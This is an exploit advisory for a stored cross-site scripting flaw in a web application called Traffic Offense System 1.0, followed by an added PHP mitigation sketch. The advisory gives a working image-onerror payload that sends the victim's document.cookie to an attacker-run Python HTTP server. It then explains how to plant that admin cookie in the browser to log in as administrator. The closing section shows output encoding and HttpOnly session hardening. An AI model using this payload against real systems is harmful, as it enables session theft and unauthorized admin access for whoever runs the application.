# Exploit Title: Traffic Offense System | Stored Cross Site Scripting (Cookie-theft)  
# Exploit Author: Richard Jones  
# Date: 03-04-2021  
# Vendor Homepage:  
# Software Link:  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
Stored XSS by adding an offense report.  
1. Using an officer account, log in to the application.  
2. Start a Python HTTP server (python3 -m http.server 8090)  
3. Go to Report Offense, make a report, and add the payload below in the name or address field:  
"><img src=x onerror="this.src='http://YOUR-IP:8090/?'+document.cookie; this.removeAttribute('onerror');">  
4. Wait for the admin to log in.  
5. Cookies will show in the Python server output.  
6. Get admin access here: http://TARGET/trafic/index.php . Open dev tools (F12), add the cookie to the session, and refresh the page to be logged in as admin.
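
Mitigation sketch (added example, not part of the original advisory and not the application's own code): the steps above work because a stored name/address value is rendered as HTML and the session cookie is readable from script. The function names and the input field markup below are assumptions; the sample value is constructed.

```php
<?php
// Added illustration, not the Traffic Offense System's source code.
// Function names and the input field layout are assumptions.

// Constructed sample of a stored "name" value that breaks out of an attribute.
$storedName = '"><img src=x onerror="/* script reading document.cookie */">';

// Vulnerable pattern: the stored value is concatenated into HTML as-is.
function render_unsafe(string $name): string
{
    return '<input type="text" name="name" value="' . $name . '">';
}

// Context-aware output encoding: quotes and angle brackets become entities,
// so the value stays inside the attribute and is displayed as text.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_safe(string $name): string
{
    return '<input type="text" name="name" value="' . e($name) . '">';
}

// Session hardening, called before any output is sent. ini_set is used so
// this also works on PHP 7.2, the PHP line that XAMPP 7.2.34 ships.
function start_hardened_session(): void
{
    ini_set('session.cookie_httponly', '1');  // hide cookie from document.cookie
    ini_set('session.use_only_cookies', '1'); // never accept session IDs in URLs
    ini_set('session.use_strict_mode', '1');  // reject uninitialized session IDs
    // ini_set('session.cookie_secure', '1'); // enable once the site is HTTPS-only
    session_start();
}

// Demo when run from the command line: compare the two renderings.
if (PHP_SAPI === 'cli') {
    echo "unsafe: ", render_unsafe($storedName), PHP_EOL;
    echo "safe:   ", render_safe($storedName), PHP_EOL;
}
```

Output encoding is the actual fix for the injection; the HttpOnly flag only removes the cookie from what an injected script can read.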